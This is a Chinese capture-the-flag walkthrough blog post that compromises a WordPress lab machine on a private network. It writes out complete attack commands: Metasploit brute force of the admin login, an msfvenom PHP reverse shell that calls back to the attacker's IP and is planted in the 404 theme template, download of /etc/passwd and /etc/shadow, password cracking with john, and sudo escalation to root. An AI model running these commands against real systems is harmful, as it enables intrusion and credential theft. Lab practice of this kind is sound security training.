CTF练习:HTTP服务之暴力破解


靶机地址:
链接: https://pan.baidu.com/s/1axC2PaXqscbZKNpTq3dTkg
提取码: t8uz

环境准备

开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。
查看攻击机kali的IP,为192.168.137.176
在这里插入图片描述
查看靶机的IP,为192.168.137.176

在这里插入图片描述
ping一下,测试连通性,没问题,开始信息收集。
在这里插入图片描述

信息收集

探测靶场开放的端口信息与服务版本

nmap -sV 192.168.137.197

在这里插入图片描述
使用nikto对开放的80端口进行进一步挖掘,发现可疑目录,/sercet/。

nikto -host http://192.168.137.197

在这里插入图片描述
把它粘贴到浏览器去访问一下

http://192.168.137.197/secret/

在这里插入图片描述
往下浏览,发现一个log in链接,点击
在这里插入图片描述
发现后台登录页面。
在这里插入图片描述

暴力破解

使用wpscan,获取目标网页的用户名,发现用户名admin。

wpscan --url 192.168.137.197/secret/ --enumerate u

在这里插入图片描述
得到了用户名,那接着使用metasploit对密码进行暴力破解。

启动
msfconsole  
选择模块
use auxiliary/scanner/http/wordpress_login_enum
查看参数
show options
设置目标ip
set rhosts 192.168.137.197
设置密码文件
set PASS_FILE /usr/share/wordlists/dirb/common.txt
设置我们已经知道的用户名admin
set username admin
设置目标uri
set targeturi /secret/
运行,开始破解
run

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
破解成功,用户名为admin,密码为admin。
在这里插入图片描述
去登录页面,输入admin和admin进入后台
在这里插入图片描述
在这里插入图片描述

制作与上传shell

使用msfvenom制作shell代码,将代码复制下来。

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.137.176 lport=4444 -f raw

在这里插入图片描述
去到后台页面,点击右侧的Appearance的editor
在这里插入图片描述
再点击右侧的404 Template,将其代码替换成我们的shell代码
在这里插入图片描述
点击update file按钮提交,更新完成。
在这里插入图片描述
回到终端,使用msf监听4444端口

退出当前模块
back
使用监听模块
use exploit/multi/handler
设置为php模式
set payload php/meterpreter/reverse_tcp
查看参数
show options
设置kali的ip
set LHOST 192.168.137.176
开始监听
run

在这里插入图片描述
去浏览器访问shell所在的404页面。

192.168.137.197/secret/wp-content/themes/twentyseventeen/404.php

在这里插入图片描述
回到终端,已经返回了shell,sysinfo一下没问题。
在这里插入图片描述

进入靶机与提权

输入shell,id一下,是www-data用户,权限不够,需提权
在这里插入图片描述
下载/etc/passwd和/etc/shadow文件

download /etc/passwd
download /etc/shadow

在这里插入图片描述
新开一个终端,ls一下,可以看到下载的两个文件,使用unshadow进行整合

unshadow passwd shadow > cracked

在这里插入图片描述
使用john对生成的cracked进行解密,得到用户marlinspike与密码marlinspike
在这里插入图片描述
回到终端的shell,先优化终端一下

python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述
开始root提权操作

切换到marlinspike用户
su - marlinspike
查看权限
sudo -l
提权
sudo bash

在这里插入图片描述
进入到root目录,寻找flag文件。
在这里插入图片描述
这次靶机主要是相关的HTTP服务练习,并没有flag值,所以至此完工!!!

  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值